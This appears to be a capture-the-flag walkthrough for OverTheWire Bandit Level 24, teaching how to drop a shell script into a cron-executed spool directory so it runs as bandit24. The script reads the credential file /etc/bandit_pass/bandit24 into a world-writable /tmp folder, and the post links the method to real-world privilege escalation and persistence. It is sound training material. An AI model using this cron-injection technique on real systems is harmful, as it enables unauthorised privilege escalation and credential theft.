🎬 OverTheWire Bandit Level 24: Creating Your First Exploit Script

Level 24 is a milestone—this is where you create your first exploit script. This level teaches you how to write shell scripts, understand cron job execution, and get automated processes to run your code. It's a big step, and you should be proud when you complete it.

Level 24 teaches you:

• Writing your first shell script
• Understanding cron job execution
• File permissions and directory access
• Timing and synchronization
• How to get privileged processes to execute your code

If you've made it this far, you understand cron jobs and script analysis. Now you're learning to create scripts that exploit automated processes—this is a fundamental skill in penetration testing.

---

🎯 The Objective

After logging into bandit23, your goal is to find the password for Level 24. A program is running automatically from cron that executes scripts from a specific directory. You need to create a script that will be executed by the cron job (running as bandit24) and have it write the password to a location you can read.

What Level 24 teaches:

• Writing shell scripts
• Understanding cron execution
• File permissions
• Timing and synchronization
• Script exploitation

The challenge: Create a script, place it in the directory where cron looks for scripts, and have it executed with bandit24 privileges to read the password file.

---

🔍 Understanding the Problem

Let's start by connecting to Level 23 and exploring:

sshpass -p `cat bandit23` ssh bandit23@bandit.labs.overthewire.org -p 2220

Once connected, let's check the cron configuration:

cd /etc/cron.d/
ls -la
cat cronjob_bandit24

The problem: The cron job executes scripts from /var/spool/bandit24, but those scripts get deleted after execution. You need to create a script that will be executed as bandit24 and write the password somewhere you can read it.

---

🧠 Understanding Script Execution and Cron

Here's what's happening: The cron job runs scripts from a directory, executes them as bandit24, then deletes them. You need to create a script that exploits this.

How the Cron Job Works

The cron job:

1. Looks in /var/spool/bandit24 for scripts
2. Executes each script as bandit24
3. Deletes the scripts after execution
4. Runs every minute

The opportunity: Since scripts run as bandit24, they can read /etc/bandit_pass/bandit24. Your script just needs to write that password to a location you can access.

Understanding File Permissions

Key permissions:

• /var/spool/bandit24 — You can write here (that's why you can place scripts)
• Scripts run as bandit24 — So they can read /etc/bandit_pass/bandit24
• Scripts get deleted — So you need to keep a copy

The strategy:

1. Create a temporary directory you control
2. Write your script there first
3. Copy it to /var/spool/bandit24 just before cron executes
4. Have your script write the password to your temp directory
5. Read the password from your temp directory

---

📋 Step-by-Step Walkthrough

Step 1: Connect to Level 23

sshpass -p `cat bandit23` ssh bandit23@bandit.labs.overthewire.org -p 2220

Step 2: Check the Cron Configuration

cd /etc/cron.d/
cat cronjob_bandit24

What you'll see:

@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

The cron job runs /usr/bin/cronjob_bandit24.sh every minute.

Step 3: Read the Cron Script

cat /usr/bin/cronjob_bandit24.sh

What you'll see:

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./"$i"
        rm -f ./"$i"
    fi
done

Breaking this down:

• myname=$(whoami) — Gets current user (bandit24 when run by cron)
• cd /var/spool/$myname — Changes to /var/spool/bandit24
• for i in * .* — Loops through all files (including hidden ones)
• timeout -s 9 60 ./"$i" — Executes each script with 60-second timeout
• rm -f ./"$i" — Deletes the script after execution

The key: Any script you place in /var/spool/bandit24 will be executed as bandit24 and then deleted.

Step 4: Check Directory Permissions

Let's see if you can write to the spool directory:

ls -la /var/spool/bandit24

You should be able to write files here (that's the point of the challenge).

Step 5: Create a Temporary Directory

Create a directory where you can store your script and receive the password:

mkdir -p /tmp/m1k3
chmod 777 /tmp/m1k3

Breaking this down:

• mkdir -p — Creates directory (creates parent directories if needed)
• chmod 777 — Makes it world-readable, writable, and executable

Why: You need a place to:

• Store your script before copying it
• Receive the password file that your script creates

Step 6: Create Your Exploit Script

Change to your temp directory and create the script:

cd /tmp/m1k3

Now create the script. You can use any text editor:

Using nano:

nano get-flag.sh

Using vim:

vim get-flag.sh

Using echo (if you prefer):

cat > get-flag.sh << 'EOF'
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt
EOF

The script content:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt

Breaking this down:

• #!/bin/bash — Shebang (tells system to use bash)
• cat /etc/bandit_pass/bandit24 — Reads the password (runs as bandit24)
• > /tmp/m1k3/flag.txt — Writes it to your temp directory

Important: Make sure the script is executable:

chmod +x get-flag.sh

Step 7: Check the Current Time

The cron job runs every minute at the top of the minute (e.g., 12:00, 12:01, 12:02). Check the time:

date

What you'll see:

Mon Jan 16 12:34:56 UTC 2026

Note the seconds. You want to copy your script to /var/spool/bandit24 just before the next minute starts (when seconds are around 50-59).

Step 8: Copy Script to Cron Directory

Wait until near the top of the next minute, then copy your script:

cp /tmp/m1k3/get-flag.sh /var/spool/bandit24/

Timing tip: Copy it when the seconds are around 55-59. This gives the cron job time to execute it before it gets deleted.

Why timing matters: The cron job runs at the top of each minute. If you copy your script too early, it might get deleted before cron runs. If you copy it too late, cron might have already run for that minute.

Step 9: Wait and Check for the Flag

Wait a few seconds, then check your temp directory:

ls -la /tmp/m1k3/
cat /tmp/m1k3/flag.txt

What you'll see: The password for Level 24!

If it didn't work:

• Check the time again
• Make sure your script is executable
• Make sure the temp directory has correct permissions
• Try copying the script again at the right time

Step 10: Save the Password

Copy the password and save it:

On Linux/macOS:

echo "PASSWORD_HERE" > bandit24

On Windows (PowerShell):

"PASSWORD_HERE" | Out-File -FilePath bandit24 -NoNewline

Step 11: Connect to Level 24

sshpass -p `cat bandit24` ssh bandit24@bandit.labs.overthewire.org -p 2220

---

💡 Understanding Shell Scripting in Depth

Let's dive deeper into what you just created:

The Shebang Line

#!/bin/bash tells the system which interpreter to use:

• #! — Magic number (tells kernel this is a script)
• /bin/bash — Path to the bash interpreter

Why it matters: Without the shebang, the system might not know how to execute your script.

Script Permissions

Making scripts executable:

chmod +x script.sh

What this does:

• Adds execute permission
• Allows the script to be run directly: ./script.sh

Without execute permission:

• You'd need to run: bash script.sh
• Or: sh script.sh

Redirection and Output

Output redirection:

• > — Overwrites file (creates if doesn't exist)
• >> — Appends to file
• 2> — Redirects stderr
• &> — Redirects both stdout and stderr

In your script:

cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt

This writes the password to flag.txt, overwriting it if it exists.

Understanding the Cron Execution Flow

What happens:

1. Cron runs /usr/bin/cronjob_bandit24.sh as bandit24
2. Script changes to /var/spool/bandit24
3. Script finds your get-flag.sh
4. Script executes get-flag.sh as bandit24
5. Your script reads /etc/bandit_pass/bandit24
6. Your script writes password to /tmp/m1k3/flag.txt
7. Cron script deletes get-flag.sh
8. You read flag.txt

The key: Your script runs with bandit24 privileges, so it can read the password file.

---

🔒 Real-World Context

Why does this matter in penetration testing?

Creating scripts that get executed by privileged processes is a common exploitation technique:

1. Cron Job Exploitation

In real assessments, you might find:

• Cron jobs that execute scripts from world-writable directories
• Cron jobs that don't properly validate script sources
• Cron jobs that run with elevated privileges

The technique: Create a malicious script, place it where cron will execute it, wait for execution.

2. Script Injection

Similar techniques apply to:

• Web applications that execute user-provided scripts
• Backup systems that run scripts from specific directories
• Automation tools that execute scripts

The skill you're learning: How to get privileged processes to execute your code. This is essential for:

• Privilege escalation
• Remote code execution
• Persistence
• Lateral movement

3. Real-World Examples

Common scenarios:

• Cron jobs executing scripts from /tmp
• Backup scripts running from user-writable directories
• Web applications executing uploaded scripts
• System automation tools with misconfigurations

The skill you're learning: How to create and deploy exploit scripts. This is fundamental for:

• Penetration testing
• Exploit development
• Privilege escalation
• Understanding system automation

---

🛠️ Alternative Methods

Here are different ways to approach Level 24:

Method 1: Simple Script (Recommended)

mkdir -p /tmp/m1k3
chmod 777 /tmp/m1k3
cat > /tmp/m1k3/get-flag.sh << 'EOF'
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt
EOF
chmod +x /tmp/m1k3/get-flag.sh
# Wait for right time, then:
cp /tmp/m1k3/get-flag.sh /var/spool/bandit24/
# Wait a few seconds, then:
cat /tmp/m1k3/flag.txt

Pros: Simple, clear, works reliably Cons: Requires timing

Method 2: Using echo

mkdir -p /tmp/m1k3 && chmod 777 /tmp/m1k3
echo '#!/bin/bash' > /tmp/m1k3/get-flag.sh
echo 'cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt' >> /tmp/m1k3/get-flag.sh
chmod +x /tmp/m1k3/get-flag.sh
cp /tmp/m1k3/get-flag.sh /var/spool/bandit24/

Pros: Can be done in one command sequence Cons: Less readable

Method 3: More Robust Script

cat > /tmp/m1k3/get-flag.sh << 'EOF'
#!/bin/bash
# Get the password
PASSWORD=$(cat /etc/bandit_pass/bandit24)
# Write to multiple locations (backup)
echo "$PASSWORD" > /tmp/m1k3/flag.txt
echo "$PASSWORD" > /tmp/m1k3/backup.txt
EOF
chmod +x /tmp/m1k3/get-flag.sh
cp /tmp/m1k3/get-flag.sh /var/spool/bandit24/

Pros: More robust, has backups Cons: More complex than needed

For Level 24, use Method 1 — it's the clearest and most reliable.

---

🚨 Common Mistakes

Mistake 1: Not Making Script Executable

Wrong:

cat > script.sh << 'EOF'
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/m1k3/flag.txt
EOF
cp script.sh /var/spool/bandit24/
# Script might not execute!

Right:

chmod +x script.sh
cp script.sh /var/spool/bandit24/

Why: The cron script executes files directly. Without execute permission, it might fail or behave unexpectedly.

Mistake 2: Wrong Timing

Wrong: Copying script at random time, missing the cron execution window.

Right: Check the time, wait until seconds are 55-59, then copy.

Why: Cron runs at the top of each minute. You need to place your script just before that.

Mistake 3: Not Keeping a Copy

Wrong: Creating script directly in /var/spool/bandit24.

Right: Create in temp directory first, then copy.

Why: Scripts get deleted after execution. If something goes wrong, you need a copy to try again.

Mistake 4: Wrong File Permissions on Temp Directory

Wrong:

mkdir /tmp/m1k3
# Default permissions might not allow script to write

Right:

mkdir /tmp/m1k3
chmod 777 /tmp/m1k3

Why: The script runs as bandit24, but needs to write to your directory. Permissive permissions ensure it works.

Mistake 5: Not Understanding Execution Context

Wrong thinking: "I'll create a script that runs as me."

Reality: The script runs as bandit24 (via cron), so it can read /etc/bandit_pass/bandit24. That's the whole point!

Solution: Understand that your script executes with bandit24 privileges, not your privileges.

---

💻 Practice Exercise

Try these to reinforce what you learned:

1. Create a simple script:

   cat > /tmp/test.sh << 'EOF'
   #!/bin/bash
   echo "Hello from $(whoami)"
   EOF
   chmod +x /tmp/test.sh
   /tmp/test.sh
   

2. Understand file permissions:

   ls -la /tmp/test.sh
   chmod -x /tmp/test.sh
   ls -la /tmp/test.sh
   

3. Practice timing:

   date
   # Watch the seconds, practice timing
   

4. Test script execution:

   # Create script
   echo '#!/bin/bash' > /tmp/hello.sh
   echo 'echo "Hello World"' >> /tmp/hello.sh
   chmod +x /tmp/hello.sh
   # Execute it
   /tmp/hello.sh
   

---

🎓 Understanding Exploit Development

This level introduces exploit development concepts:

What Is Exploit Development?

Exploit development is the process of creating code that takes advantage of vulnerabilities or misconfigurations:

1. Identify the vulnerability — Cron job executes scripts from writable directory
2. Understand the context — Scripts run with elevated privileges
3. Create exploit code — Script that reads password
4. Deploy the exploit — Place script where it will be executed
5. Collect results — Read the output

Why Exploit Development Matters

Understanding how to create exploits is essential for:

• Penetration testing
• Security research
• Understanding vulnerabilities
• Developing defenses
• Red team exercises

The skill you're learning: How to create scripts that exploit system misconfigurations. This is fundamental for:

• Penetration testing
• Exploit development
• Privilege escalation
• Security research

---

🔗 What's Next?

Level 25 will likely introduce another system concept or build on script exploitation. You'll continue building on the concepts you've learned about cron jobs, shell scripting, and privilege escalation.

Before moving on, make sure you:

• ✅ Can write basic shell scripts
• ✅ Understand file permissions
• ✅ Know how to make scripts executable
• ✅ Understand cron execution timing
• ✅ Can create scripts that exploit automated processes

---

📚 Key Takeaways

After completing Level 24, you should understand:

1. Shell scripting basics — Writing your first exploit script
2. File permissions — Making scripts executable and directories writable
3. Cron execution — How automated processes execute scripts
4. Timing — Synchronizing with cron job execution
5. Exploit development — Creating code to exploit misconfigurations

---

🎯 Quick Reference

Concept	Explanation	Example
Shebang	Script interpreter	#!/bin/bash
chmod +x	Make executable	chmod +x script.sh
Script execution	Run script	./script.sh
Output redirection	Write to file	command > file.txt
Cron timing	Runs at top of minute	Copy script at :55-:59

---

🔍 Advanced: Understanding Script Execution

If you want to go deeper, here's how script execution works:

Script Execution Process

When you execute a script:

1. Kernel reads shebang — Determines interpreter
2. Interpreter starts — Bash, Python, etc.
3. Script runs — Commands execute sequentially
4. Output generated — stdout, stderr
5. Script exits — Returns exit code

Security Implications

Why script execution is powerful:

• Can run with different privileges
• Can access system resources
• Can execute system commands
• Can be automated

Why script execution is dangerous:

• Misconfigurations can lead to privilege escalation
• User-controlled scripts can be exploited
• Scripts can access sensitive data
• Scripts can modify system state

---

Questions about Level 24, shell scripting, or exploit development? Reach out directly:

• Email: m1k3@msquarellc.net
• Phone: (559) 670-3159
• Schedule: Book a free consultation

---

M Square LLC
Cybersecurity | Penetration Testing | No-Nonsense Advice